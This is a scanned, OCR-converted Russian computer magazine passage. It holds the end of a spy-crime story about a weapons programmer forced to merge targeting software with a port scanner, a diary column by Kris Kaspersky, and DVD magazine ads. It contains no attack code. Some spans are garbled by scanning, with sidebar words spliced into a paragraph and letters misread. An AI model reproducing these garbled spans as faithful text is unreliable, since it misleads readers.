не в подвальном помещении — никаких тебе указателей и табличек, 
никаких намеков на то, куда и к кому идет. Пригласили, провели, акку- 
ратно впустили и также аккуратно затворили за спиной дверь... 

Человек в кабинете не был ему знаком. Он никогда не видел его 
в институте, никогда не сталкивался с ним на курсах — и, однако же, 
был уверен, что знает его уже давно. Было в нем что-то такое — дру- 
желюбное, запоминающееся, приветливое... И Алмазов сразу проник- 
ся к нему доверием. 

Человек пригласил его присесть, угостил дорогими сигаретами, 
хорошим коньяком, похвалил за усердие, поздравил с успешной сда- 
чей экзаменов. Алмазов чувствовал, что ему неприкрыто льстят — но 
коньяк уже сделал свое дело, похвалы легли на благодатную почву... 

«Хочу ли я работать по новой специальности? Конечно! И боль- 
ше зарабатывать? Само собой! От чего придется отказаться, от обще- 
ния? С кем? С друзьями? Почему? Новая работа подразумевает со- 
вершенно другой режим секретности? Да ради бога! Женат? Да. Есть 
дочь... Условия для работы жены и обучения дочери? Да обеими рука- 
ми «за». Когда приступать-то? Хоть завтра... Чудесно. Давайте адрес, 
куда приходить и во сколько...» 

Так его взяли на работу. Деньги платили исправно — и хорошие. 
Он программировал, считал, создавал системы управления вооруже- 
нием, понятия не имея, где, когда и как будет применяться то, что он 
сделал. Афганистан к TOMY времени уже был легендой, Чечня тоже 
постепенно превращалась в мирную страну. Совесть его молчала — и 
только изредка до него доносились отголоски новостей. Он видел по 
телевизору, как продаются различные артиллерийские установки, ра- 
дарные станции, новые самолеты и танки, усиливая армии Индии, 
Норвегии, Греции и еще десятков стран по всему миру. 

И где-то там стояли вычислители, равных которым не было. Ору- 
жие, усиленное его мыслью, не знало промаха. Он понимал это, гор- 
дился этим, но как-то отстраненно, относясь к результатам своей ра- 
боты как к чему-то мифологическому — где это оружие, в кого сейчас 
стреляет, да и стреляет ли? Скорее, пылится где-то на складах, являя 
собой скрытую мощь... 

И вот так он работал — в компании с еще парой десятков чело- 
век, каждый из которых был гениален в своей области. Двое порази- 
тельно точно прогнозировали развитие идей в космической сфере, 
выдавая чудеса технической мысли с завидной периодичностью и от- 
мечая старт каждого спутника, снабженного их программами слеже- 
ния; еще несколько человек занимались тем же самым, но полигоном 
для творчества были морские глубины — пара подводных лодок, осна- 
щенных их софтом, ставила на уши весь противолодочный флот США, 
окончательно потерявший уверенность в своей неуязвимости. 

Остальные тратили свое рабочее время и казенные деньги на 
абсолютно экзотические вещи типа сейсмического оружия, рассчиты- 
вая всякого рода напряжения земной коры, предполагая места воз- 


можного закладывания зарядов для того, чтобы погрузить в бездну 
Мирового океана Калифорнию раньше, чем это сделает Господь Бог. 
Алмазов, конечно, интересовался тем, что происходит вокруг, но пони- 
мал, что его любопытство может быть неправильно истолковано кура- 
торами из Службы Безопасности, поэтому старался работать хорошо 
и незаметно. Работал себе и работал, пользуясь всеми благами, что 
предоставлял этот секретный проект в нагрузке к программированию 
— лучшие санатории, баснословные зарплаты и многие другие льго- 
ты, недоступные простым смертным. 

Но однажды случилась беда. 

Так уже бывало в России — кто-то принимает никому не понят- 
ные политические решения, начинается сокращение только что соз- 
данного вооружения, оно мгновенно становится никому не нужным и 
только мозолит глаза. Произошло это и с «ящиком» Алмазова. Приш- 
ли какие-то люди, сунули директору под нос несколько бумаг, застави- 
ли поставить подписи, после чего шлепнули парочку штампов, опеча- 
тали сейфы и лаборатории, вызвали каждого сотрудника на собеседо- 
вание и довели суть дела до каждого. 

А суть была простой и циничной. Прямо как у коммунистов — 
что-то вроде «генеральная линия сегодняшнего дня, текущий момент и 
прочая фигня никаким образом не пересекаются с вашими желаниями 
и умениями». Всем было предложено уволиться с хорошим выходным 
пособием — ребята в серых пиджаках вынимали деньги прямо из 
портфелей, раздавали всем, требуя подпись только в документе, подт- 
верждающем уровень секретности. 

Получил свою кучу денег и Алмазов — потом краем глаза прос- 
мотрел бумагу, где говорилось о том, что нигде и никогда он не имеет 
права разглашать факт своей работы в конструкторском бюро по про- 
изводству секретных видов вооружения, никогда не сможет выехать 
за границу и не имеет права вынести отсюда ничего, что разработал 
он лично или его коллеги. Другие пункты он даже не стал читать — 
был уверен, что где-то в конце обязательно будет про расстрел. 

Деньги с трудом поместились в его маленький «дипломат», в ко- 
тором отродясь не было ничего толще папки и диска. Он посидел на 
пороге своего кабинета, который чудом избежал печати на двери, си- 
ротливо вздохнул и уже собрался уходить, когда к нему неожиданно 
подошел один из тех, кто вел с ним беседу полчаса назад. 

Человек в сером пиджаке. 

— Товарищ Алмазов, — тихо сказал он. — У меня есть к вам малень- 
кое предложение. 

— Явас слушаю, — напрягся программист, понимая, что такие люди 
просто так не подходят и ничего не предлагают. 

— Возьмите вот это, — мужчина оглянулся, но не воровато, а как-то 
по-хозяйски — вроде «главное, чтобы холопы не углядели, чем баре 
занимаются». Вытащив из внутреннего кармана пиджака маленький 
сверток, в котором угадывалось что-то плоское, он сунул его Алма- 
зову. — Возьмите и спрячьте дома. Это может когда-нибудь понадо- 
биться. Я вам это говорю, как нормальный, трезво мыслящий чело- 
век. Я понимаю, что такие конторы, как ваша, просто так не закры- 
вают. Кому-то очень надо... 

Мужчина приподнял взгляд поверх головы Алмазова, и тот по- 
нял, на что он намекает. Тем временем человек продолжил: 

— Политика — это, конечно, здорово. Весело. Но не очень, я вам гово- 
рю, как проверивший на себе. Вы уберите, уберите, нечего держать на 
виду у всех. Я ведь сейчас рискую. 

Алмазов спохватился, убрал сверток, в котором он на ощупь оп- 
ределил что-то, напоминающее диски. Замок «дипломата» щелкнул; 
человек вздохнул и сказал: 

— Если вы понадобитесь, то вас найдут. Где угодно. 

Прозвучало это очень и очень неласково. Алмазов почувствовал 
дрожь в коленках. 

— За-зачем? — спросил он, прекрасно понимая, каким будет ответ. 
— Чтобы распорядиться вашим богатым наследством. Я не делаю из 
того, что вы сейчас взяли, секрета для вас. Можете изучить содержи- 
мое. Можете даже кое-что там подкорректировать — если достанет 
фантазии и ума... 

— Почему именно я? — спросил Алмазов. — Нас тут было довольно 
много... 

— Фамилия у Bac... Не знаю, — собеседник ухмыльнулся. — Но поче- 
му-то к Рабиновичу из сейсмического отдела и Тимошенко из этого... 
как его... 

— Скажем, подводного, — подсказал Алмазов. 

— Ага... Так вот к ним — душа не лежит. 

— Вы шовинист? Из какого-нибудь националистического движения? 
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— Я патриот. Просто патриот. Я люблю свою страну. Но мне приходит- 
ся выполнять приказы, — жестким голосом прокомментировал он воп- 
рос Алмазова. — А теперь идите. Вы уволены. 

И Алмазов ушел. Ушел, унося с собой в портфеле одни из самых 
серьезных секретов военной машины Российского государства... 

Дома он, конечно же, просмотрел содержимое дисков. 

Системы прицеливания, наведения, интеллектуального выбора 
целей, огромное количество модулей, способных масштабироваться и 
устанавливаться на любое ныне существующее вооружение. Чертежи 
и схемы, исходные коды программ, искусственный интеллект, расчеты 
траекторий спутников — наших и вероятного противника... 

Он щелкал «мышкой» по каталогам, разглядывал на домаш- 
нем компьютере то, что ему передал человек, назвавший себя пат- 
риотом, и никак не мог понять — зачем? Зачем ему передали на 
сохранение все это? Ведь он сейчас является хранителем — случай- 
ным хранителем — государственных тайн, могущих навредить этому 
самому государству! 

Ответа не было. Помучавшись над этим вопросом, Алмазов по- 
тихоньку стал тратить деньги, выделенные ему государством в качест- 
ве компенсации за увольнение. Жена, видя, что он перестал работать 
и никому не нужен, спустя полгода ушла от него, уведя с собой дочь — 
a еще через некоторое время стала требовать деньги на ее обучение 
в том ВУЗе, куда девочка была устроена благодаря прошлым заслу- 
гам отца еще в бытность его в «ящике». Он из кожи вон лез, но наб- 
рать нужную сумму с каждым годом становилось все труднее. 

И когда он уже совсем отчаялся — к нему пришли двое... Патри- 
оты. Напомнили о дисках. Объяснили ситуацию. Дали денег — сразу. 
Он сумел вовремя заплатить за дочь — тем более что курс был уже 
выпускной. Там хватило и на обучение, и на платье для бала, и на рес- 
торан, и даже на золотые часы к окончанию. 

Когда они ушли, он вынул из тайника диски, освежил в памяти их 
содержимое и через полчаса нашел то, что они просили. 

Модуль снайперской стрельбы. Он написал его едва ли не в са- 
мом начале своей программистской карьеры — в качестве обобща- 
ющего тренировочного задания. Программа при помощи небольшой 
доводки до ума могла быть установлена хоть на главный калибр 
линкора, хоть на спутник, хоть на управляемый искусственным ин- 
теллектом танковый пулемет. Этакий конструктор для военных — 
заставить точно стрелять при помощи программы Алмазова можно 
было все, что угодно. 

Сразу после создания этого чуда он его запатентовал, потом до- 
работал немного для танков, поставляемых в Норвегию — а потом, бу- 
дучи направленным в другое русло военной машины, забыл о своем 
детище. И вот оно снова понадобилось... 

Пугало только одно — сумма, которую ему обещали за выполне- 
ние задания. Если он сумел при помощи аванса поправить свое мате- 
риальное положение практически полностью, то что будет потом?.. 
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— Мы будем вот так и дальше сидеть? — спросил Рыков, немного при- 
дя в себя от того, что он узнал от Алмазова. — Я думаю, все-таки стоит 
попытать счастья и связаться с тем, кого называют «инструктором». 
Ну, хотя бы объяснить суть дела!.. 

Алмазов кивнул. Вроде бы он все делал правильно, по инструк- 
ции. Наплел про дочь под прицелом, всем своим скорбным видом дал 
понять, насколько ему страшно. Это все было обговорено заранее и 
входило в план. 

Он даже знал, что никаких паролей для связи с инструктором 
у Лукина не было. И быть не могло. Незачем... 
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— Думаю, мы должны попробовать, — угрюмо сказал Алмазов. — 
Кто рискнет? Вы? Или я? 

— Давайте уж вместе! — Рыков махнул рукой и подошел к компьюте- 
ру. Он сам ввел номер 444115686, нашел и добавил в контакт-лист че- 
ловека, дав ему банальный ник — «Инструктор». 

— Онлайн... 

— Так обещали же... — не отрываясь от экрана, ответил Алмазов. — 
У меня небогатый опыт общения подобным образом. Вы хоть предс- 
тавляете, как мы начнем беседу? Что скажем? Чем поинтересуемся? 
— Хрен его знает, — сказал Рыков и машинально набрал: 


— «Привет». 
Ответ пришел практически мгновенно: 

— «Привет». 

— «Мы готовы работать. Лукин убит. Ждем дальнейших указаний». 
Пауза. 

— Ну вы написали... — процедил сквозь зубы Алмазов. — «Убит». Что 


он там сейчас подумает?.. 
— Есть варианты? Наверняка он свяжется с кем-то, кто даст рекомен- 
дации, — огрызнулся Рыков. — Глядите, отвечает! 

Действительно, на экране появилось сообщение «Инструктор на- 
бирает текст...» Алмазов и Рыков даже придвинулись поближе к экра- 
ну, чтобы не пропустить ни слова. В квартире стало тихо, только под 
столом шумел кулер системного блока. 

— «Необходимо соединить вместе две программы. Сканер Рыкова и 
модуль Алмазова. Для этого в сканере есть точки входа. Надеюсь, Ры- 
ков правильно понял свое задание, не зря ему было дано две недели. 
Время у вас есть. Однако — принимая во внимание неожиданные обс- 
тоятельства в виде смерти Лукина, сроки сжимаются до одних суток — 
начиная с этой минуты. Двадцать четыре часа на то, чтобы объединить 
ваши программы...» Ничего не понимаю, — Рыков поднял глаза от эк- 
рана. — Зачем? Что они там придумали? 

Алмазов продолжал смотреть в экран, не отрываясь. Он думал 
о себе, своей дочери и о том, что будет потом. 

Что будет потом... 

— Вы можете мне хоть что-нибудь объяснить? — Рыков дернул его за 
рукав. — Получается так — мы должны были принести свои програм- 
мы Лукину, а он — слепить из них одно целое. И получить за это день- 
ги. Теперь Лукина нет. Как нам заплатят? 

— Я думал, вы что-нибудь другое спросите, — удивился Алмазов. — 
А вы все про деньги... Если вам что-то непонятно — спросите 

у Инструктора. Он ведь пока еще в Сети. 

— Действительно, — кивнул Рыков, положил пальцы на клавиатуру, 
но в следующую секунду вдруг спросил: 

— А что вы имели в виду — что-нибудь другое? 

Алмазов едва удержался, чтобы не засмеяться в полный голос: 
— То есть для вас совершенно не удивительно, что кто-то предла- 
гает свести в одно целое программу для сканирования портов и мо- 
дуль снайперской стрельбы? Уж поверьте мне на слово — более 
глупого задания за всю свою жизнь я не получал, и надеюсь, что 
оно будет первым и последним. Даже как-то успокаивает, что нам 
дали всего двадцать четыре часа — ибо подобным бредом трудно 
заниматься дольше. 

Рыков молча выслушал его, усмехнулся и прокомментировал: 
— Да, совершенно с вами согласен. Но заданию не удивился. Как 
только увидел здесь труп в коридоре — через минуту уже вообще ни- 
чему не удивлялся. Ладно, вы пока подумайте над тем, как мы прове- 
дем с вами ближайшие сутки с мертвецом в коридоре, а я свяжусь 

с Инструктором еще раз. 
Алмазов предоставил Рыкову право 


РУКИ ГО СТЬ задавать вопросы, а сам вышел в коридор. 
Тело, прикрытое плащом, застыло в неле- 


ЕРЖАЛ пой позе; даже с расстояния в несколько 
метров чувствовалось, что мышцы уже ока- 


a менели. Кровавые следы, произведшие 
ЗА С П | Н 0 И 5 жуткое впечатление в первые секунды, сей- 
час уже вообще не удивляли и не будора- 
ГЛАЗА жили воображение. Он прошел ко входной 
С М 0 Т [> ЕЛ И ный «Калашников», оружие спецназа и 
ДПС. Стоял, прислонившись к стене и пери- 
НА ХО ЗЯ И НА одически поглядывая то на окно, ведущее 
во двор, то на дверь. 


двери, тихо посмотрел в глазок. 
На площадке между этажами стоял 
человек с автоматом на плече. Укорочен- 


Когда он в очередной раз поднял взгляд вверх, Алмазов маши- 
нально отшатнулся от двери, едва не зацепив вешалку. 

Из комнаты доносилось бормотание Рыкова, который что-то 
читал с экрана. Возвращаться очень не хотелось — особенно после 
того, как стало ясно, что те, кто планировал операцию, ничуть не 
преувеличивали. Труп в коридоре и автомат на плече убеждали луч- 
ше всяких слов. 

— Черт знает что... — шепнул Алмазов. — Патриоты хреновы... 

Когда он вошел в комнату, Рыков с покрасневшим от волнения 
лицом повернулся к нему и едва ли не прокричал: 

— Они заплатят! Заплатят нам столько, сколько платили раньше хозя- 
ину этой квартиры! Причем каждому! 

Алмазов кивнул: 

— Охотно верю. Вы будете продолжать диалог, или мы попытаемся 
поработать? 

Рыков словно на стену наткнулся. 

— Да, конечно... Но вы разве не... Не рады? 

Алмазов вздохнул и спросил: 

— Если не считать литра крови на обоях — обстановка очень способ- 
ствует... Радоваться, веселиться, делить деньги. Рыков, вы понимае- 
те, что человека убили? И если я правильно соображаю — то убили 

с одной только целью. Чтобы он не сделал то, что должен был сделать. 
Обычно убивают именно по таким причинам... 

— Не делайте из меня идиота, — опустив глаза в пол, ответил Рыков. 
— Я готов посочувствовать — но временно. Лукина я не знал, его не 
убивал, на его место не стремился. Но раз судьба сыграла с нами та- 
кую злую шутку — почему бы не воспользоваться моментом? Давайте 
работать, раз вы настаиваете. 

— Я? Настаиваю? — Алмазов поразился подобному заявлению. — 
По-моему, все предельно просто. Вы могли уйти отсюда еще до мо- 
его прихода. Едва только увидели убитого — сразу могли рвануть 
вниз по лестнице. Вы этого не сделали — вы дождались меня. По- 
хоже, что это вы самого начала требовали продолжения банкета. 
Так что не стройте из себя девочку, доставайте свои исходники, 
будем работать. 

Рыков хотел что-то возразить, даже набрал полную грудь возду- 
ха для длинной тирады, но шумно выдохнул и не произнес ни слова. 
Алмазов был прав. Он достал диск, положил на стол. 

— Я готов. Думаю, что за сутки уложимся. Считаю, что самое главное 
— не ставить перед собой лишних вопросов. 

— Согласен, — кивнул Алмазов. — Ибо главный вопрос здесь один — 
зачем? Ответа все равно нет, поэтому за дело... 

Они загрузили свои исходники на компьютер Лукина, по пути по- 
разившись тому обилию программ, что присутствовали на этой маши- 
не одновременно. Убитый хозяин был готов к любым неожиданностям 
— он мог писать программы как минимум на пяти языках. И Алмазов, 
и Рыков — каждый нашел на его компьютере необходимые для себя 
инструменты. Они поочередно брались за дело, производя манипуля- 
ции над своими творениями — пока один набивал код, другой на листе 
бумаги выстраивал нужную для следующего шага логическую 
конструкцию. 

Странная шла работа — воедино соединялось несоединимое. 
Алмазов смотрел из-за спины коллеги, как тот монтирует куски моду- 
ля к своему сканеру и понимал, что это напоминает попытку соеди- 
нить, к примеру, утюг и корабль «Дискавери». Очевидной пользы не 
было никакой. «Челнок» с утюгом — понятия несовместные. Гений и 
злодейство программерской мысли. Наличие утюга не улучшит полет- 
ных качеств космического корабля — сам же корабль своей массой 
просто похоронит понятие «утюг», превратив его в... Превратив его... 

Алмазов даже закрыл рот рукой, чтобы не дай бог звуки не 
вырвались на свободу. Увлеченный работой Рыков не замечал вок- 
руг ничего — казалось, он уже распределил весь свой гонорар и 
только и ждет того часа, когда можно будет тратить деньги. Работал 
он с упоением... 

«Судя по всему, потенциал у него неплохой, — подумалось Ал- 
мазову. — Еще пара часов — и он досрочно выполнит работу. Сое- 
динит утюг с «челноком»... Неужели он не заметит столь очевидных 
вещей?» 

— Прошу, коллега, — внезапно встал из-за компьютера Рыков. — Ва- 
ща очередь. Мне кое-что непонятно в ваших построениях — думаю, вы 
лучше справитесь. У вас там пара мест есть — без пол-литра не разоб- 
раться. Я, знаете, все больше на Ассемблере... 

— Спасибо. Практически комплимент, — кивнул Алмазов и сел на ос- 
вободившееся место. — Да вы уже серьезно продвинулись вперед... 


Хвалю. Нам бы с вами лет пять назад встретиться — неплохой тандем 
бы получился. 

Рыков улыбнулся и вычурно поклонился. Лесть он любил... 

Алмазов справился с задачей довольно быстро. Каждый раз обновляя 
содержимое листинга и проверяя его на наличие критических ошибок, он вспо- 
минал того человека с автоматом на площадке и затылком ощущал присут- 
ствие Рыкова, который внимательно наблюдал за ходом работы из-за спины. 
— Готово, — встал со своего места Алмазов. — Думаю, что с задачей мы 
справились. Ваша и моя программы сращены намертво — но при определен- 
ном условии их можно запускать, одну из-под другой... 

— Можно, — удовлетворенно кивнул Рыков. — А можно и разделить... 

— Вы уверены? — Алмазов прищурился. 

— Акак же? — удивился тот вопросу. — Я создал специальный код, который 
активируется, когда это будет нужно... 

— Какой код? — Алмазов насторожился. 

— А разве непонятно? Я вот сидел за компьютером и все время думал — 
что мы делаем? — Рыков развел руками. — Нельзя же просто так клацать 
клавишами и не спрашивать себя о том, что ты делаешь... Это вышло как- 
то непроизвольно. И ведь вместо двадцати четырех часов мы уложились 
в семь. Разве мы не молодцы? Так есть хочется! А вам? Хотя понимаю — 
возле холодильника мертвец. Мне тоже, знаете, туда идти не хочется... 

Он взглянул на экран и радостно сообщил: 

— А Инструктор все это время был с нами, представляете? Надо быстрее 
сним связаться. Сообщить, так сказать, приятную новость... 

Алмазов хотел остановить его, но это было бесполезно — воодушев- 
ленный успехом Рыков уже набирал сообщение. 

Щелкнул замок на входной двери. Рыков вздрогнул. 

— Кто это может быть? 

Алмазов отрицательно покачал головой и не издал ни звука. 

— Онпишет... — шепнул Рыков, настороженно прислушиваясь к тому, что 
происходило в коридоре и глядя на экран. — Пишет... 

То, что пришло последним в сообщении от Инструктора, привлекло вни- 
мание Рыкова. Он наклонился поближе, перечитал, а потом непонимающим 
взглядом посмотрел на Алмазова и сказал: 

— Чушь какая-то... Сказал мне поднять руку... 

Он успел выпрямить правую руку только до уровня плеча — но челове- 
ку савтоматом этого хватило. Приказ был однозначным — оставить в живых 
человека с поднятой рукой. 

И очередь вошла в Алмазова... 
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Командующий хищно смотрел на открытый чемоданчик с деньгами. Луковни- 
ков стоял сбоку от генерала, стара- 
ясь не попадаться тому на глаза. 

— Чего-то я не понял... — командую- 
щий подошел поближе, прикоснулся 
кончиком пальца к пачкам денег. — 
Лукина в расход... 

— Так точно, товарищ генерал-лейте- 
нант, — Луковников кивнул. — Выпол- 
нив четыре наших задания он, как че- 
ловек безупречной логики, вычислил 
нас. Даю сто два процента гарантии. 
Смысла ждать, когда на пятом зада- 
нии он начнет нас шантажировать, не 
было. Потому и получил пулю. 

— Разумно, — генерал достал одну 
пачку, пролистнул ее пальцем. — Ты 
же меня знаешь — в таких случаях 
мне все разжевывать надо. Возраст, 
звание... Короче, скидку делай 

в следующий раз. 

— Слушаюсь, — Луковников козыр- 
нул. — Имея потенциальный труп Лу- 
кина, я еще до его ликвидации стал 
искать того, кто смог бы его заме- 
нить. Нашлись двое. Причем один из 
них — Алмазов — имел непосред- 
ственный контакт с той конторой, 
чью продукцию мы пускали за грани- 
цу. Мое мнение было поначалу од- 
нозначным — Рыкова в помощники, 
Алмазова запишем в герои, после 
работы Рыкова уберем. 


— В принципе, понимаю. И одобряю, — генерал покачал головой. — Что же 
изменилось? 
— В ходе работы Рыков создал то, о чем мы и не мечтали. Он создал проце- 
дуру по разделению... 
— Попроще, — генерал сморщился, как от стакана кислого сока. — 
Без всех этих... 
— Хорошо. Если вы помните, Лукин создавал для нас то, что носило назва- 
ние «информационный мусор». Мы брали проекты секретного вооружения, 
превращали их с помощью Лукина в нечто совершенно нефункциональное, 
после чего продавали заказчикам. Понять, что же мы продаем, мог только 
тот, кто имел на руках файл отката, отдельно создаваемый Лукиным для раз- 
деления кодов. 
— Так зачем же ты убрал такого ценного работника? 
— Я вам не говорил, товарищ генерал... Но в последний раз Лукин решил не 
просто получить гонорар. Он решил продать этот самый файл... Я заплатил 
ему отступного — только чтобы сделка не сорвалась. Заплатил из своих ко- 
миссионных. А вы мне про гараж... 
— Не ной, — генерал похлопал его по плечу. — Компенсирую. Рассказывай 
дальше. 
— Во время последней операции Рыков сумел встроить в этот самый 
«информационный мусор» процедуру, существенно ускоряющую 
процесс вычленения модуля стрельбы. При этом он сумел сохранить 
функциональность каждой программы в отдельности — несмотря на их 
монолитное слияние. И он сделал это за семь часов при практически 
полном невмешательстве Алмазова — ибо Алмазову все было разъясне- 
но с самого начала. 
— В смысле? 
— Алмазов знал, что Рыкова после работы убьют. Знал — и не мешал ему 
делать гениальную работу. Когда я понял, что получилось в итоге — принял 
решение... 
— Аесли бы он не сообразил? Если бы не поднял руку — что тогда? — гене- 
рал захлопнул чемоданчик и хитро прищурился. 
— На этот случай тоже был приказ. 
— Какой? 
— Пусть это останется моей профессиональной тайной, — улыбнулся под- 
полковник. 
— Ну, Песталоцци... — генерал ухмыльнулся. 
— Чипполино, — поправил его Луковников. 
— Точно. Горе ты мое... луковое... Завтра приказ подпишу. На присвоение 
очередного звания. — Только ты больше гениев в таких количествах не рас- 
стреливай. Пиночет... 

Луковников согласно кивнул... © 
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КОЛОНКА КРИСА КАСПЕРСКИ 
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СОЗНАНИЯ № 


...Проснулся около полудня, заснув 
вчера уже после 4-х часов. Ну, по- 
луднем это можно было назвать 
лишь с большой натяжкой. В моей 
норе царила полутьма, с окон дави- 
ло серое небо, слышалось, как дует 
порывистый ветер. Вставать совер- 
шенно не хотелось, но впереди была 
куча дел, так что пришлось поднап- 
рячь свой хвост (зато уже начинаю 
постепенно смещаться к своему 
обычному нормальному ночному 
графику), но делам осуществиться 
не удалось. Практически сразу же 
отрубили свет. Сейчас сижу на упсе 
(«сижу» — в переносном смысле). 
Упса с честью выдержала 3 сне- 
большим часа, оставив еще 39% 
энергии на борту, а мыщъх тем вре- 
менем лихорадочно шарил по Сети 
в поисках, чего бы такого хорошего 
зажевать. Узнал много нового, а на- 
рыл еще больше! Нервничал, конеч- 
но! Все-таки без света такой дис- 
комфорт. Зато потом, когда заго- 
релся свет, начал делать ролик 

о том, как антивирусы ругаются на 
разные хорошие файлы. Даже вспо- 
тел. Все оказалось сложнее, чем 
мыщьх поначалу думал. Точнее, не 
столько сложнее, сколько муторнее 
и утомительнее. Нужно постоянно 
держать хвост на взводе и сосредо- 
точенно точить клавиатуру, что при 
рассеянном внимании не получает- 
ся. Но это ладно. С черемухи обле- 
тели все листы, и она стоит голая 

и бесхвостая, как дрожащий на вет- 
ру мыщь,, а ветер надобно ска- 
зать... имеется... вместе с ленивым 


дождем: уже полночь. Внезапно раз- 
болелась голова и хочется спать, но 
впереди еще полстатьи и хвост. Им 
надо крутить!!! 

...Заснул в шестом часу, а прос- 
нулся, когда еще не было и одиннад- 
цати. За окном едва слышно шумел 
холодный дождь, образовавший лу- 
жи и измочаливший Ладку (Ладка — 
это собака такая), прыгающую непо- 
нятно от какого восторга, который 
мыщьх совсем не разделял. Во всем 
теле ощущалась сильная усталость, 
болела голова, а впереди: ну, впере- 
ди был просто обычный рабочий 
день. Темный и мрачный. Но зато по- 
том можно будет два выходных от- 
дохнуть. Хрен, что я начну делать 
раньше понедельника, хоть потом 
и придется писать сразу три статьи, 
по одной в день. Нет, определенно 
в таком режиме я долго не протяну... 

...Выходные прошли в просмот- 
ре пары фильмов, высадивших мы- 
щъьха на такую усталость, что в BOCK- 
ресенье ближе к полуночи он был 
уже совсем никакой и, помучив свой 
хвост, провалился в нервный сон, 
просыпаясь несколько раз — в пос- 
ледний раз в седьмом часу, когда 
и встал. Восходящее солнце, просве- 
чивающее сквозь облака, подсвечи- 
вало иней на калине, уже сбросив- 
шей почти все листья. Так начина- 
лась очередная рабочая неделя, на 
которую было запланировано четыре 
статьи, но все срочные, высадные и 
какие-то совершенно неконкретные. 

...Всю ночь провозился с под- 
готовкой видео для Xakepa, так что 
засыпал уже на рассвете. Состоя- 
ние такое: в общем, колбасное. За- 
живо закопченное. И сверху бульдо- 
зером перееханное. Усталость 
страшная. Нервы — ни к черту. 
Творческий кризис, рассеянное вни- 
мание, неспособность сосредото- 
читься на чем-то одном, отсутствие 
новых идей. Ну, и традиционные 
кошмары по ночам. Опять начал 
принимать феназепам и попустило: 
хвост поднялся и затрепетал. И хотя 
крутить им желания нет, по крайней 


мере, можно надеяться на то, что 
удастся войти в обычный рабочий 
ритм. 

...Опять заснул на рассвете (да 
еще и сголубым небом — жуть!) под 
визг репитгы, раздирающей интег- 
рированный бластер на ЕРОХ'е. Все! 
Довольно! Теперь засыпаю только 
под нормальный музон со своего 
старого-доброго Р-И!! 

...Проснулся уже в темноте, 
около шести, провожая вчерашний 
день медленно угасающим квадра- 
том окна. Ярко, но совсем не злобно 
горел красный глазок переноски, по- 
коящейся на 700\/А упсе. Едва слыш- 
но гоняла воздух своим вентилято- 
ром 2200VA. Вставать совершенно 
не хотелось. Пачка феназепама де- 
лала свое дело, кошмары сглажива- 
лись, делать ничего не хотелось, 
только лежать на топчане, медленно 
погружаясь во тьму: неожиданно 
на потолке вспыхнул яркий белый 
квадрат. Это сработал сотовый теле- 
фон, принимающий SMS'ky или нет... 
Скорее всего не SMS'ky, а входящий 
звон. Ну, звонок ясное дело от кого. 
Все-таки хорошо быть холостяком! 
(только понимаешь это слишком 
поздно, когда куча сил и энергии 
растрачены впустую). Короче, 
мыщьх все-таки поднялся, нащупал 
лапами тапки, со второй попытки 
включил 700\/А, а в след на за ней 
и 2200\/А, как обычно на мгновение 
вспыхнувшую красным огоньком. На- 
чинался новый трудовой день. Точ- 
нее ночь. Но это неважно. За окном 
была зима, сквозь окно просвечива- 
ли звезды и мороз. В планах была 
первая часть статьи для SYS'a, 
но этим планам сбыться не удалось. 
Текучка. Подготовить одно, отредак- 
тировать другое. Вот так время 
и идет. Да еще с XviD'om начал экс- 
периментировать, пытаясь выжать 
из него максимальное качество при 
минимальном размере. Короче, вот 
такая размеренная жизнь медленно 
приходящего в форму мыщьъх'а, за- 
сыпавшего уже в предрассветном 
полумраке © 


Думаешь, что посмотреть сегодня вечером? 
Выбираем кино c TOTAL DVD! 


Все о кино - читай о блокбастерах месяца, размышляй о лентах 
вместе со звездами, выбирай на какой сеанс пойти 

© 

Все о DVD - самые лучшие релизы месяца, более 50 обзоров, море 
интервью 

e 

„и немного о технологиях будущего! Телевидение высокой 


четкости, плазмы и многое другое! 


Total DVD — ультимативный журнал для киноманов! 


Каждый журнал комплектуется О\/О-приложением с великолепным 
полнометражным фильмом категории «А» (качество изображения и звука на 
диске соответствует лучшим мировым релизам), подборкой трейлеров и анонсов 
новых картин и роликами к DVD-penn3am. 
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Ищешь себе технику для домашнего кинотеатра? 
— самый лучший гид по аудио- 

видео- новинкам! 

Все о Hi-Fi, High End и Home Cinema! 


Пошаговые инструкции по составлению и инсталляции системы 
домашнего кино 


Лучшие системы и компоненты месяца - рай для новичков. Более 50 
самых новых моделей в оценочных и сравнительных тестах 


Готовые системы, интервью, самые свежие новости индустрии 
Всегда на лезвии прогресса! 


Выбираем домашний кинотеатр сжурналом «DVD Эксперт»! 
(ейчасэто стильно, это модно, это доступно, это просто! 

Каждый журнал комплектуется О\0-приложением свеликолепным полнометражным 
фильмом категории «А» (качество изображения и звука на диске соответствует 
лучшим мировым релизам) и тестами для настройки системы хоум синема. 


Если при нажатии 
на кнопку двигатель 
не завелся - срочно 
купите журнал! мам 


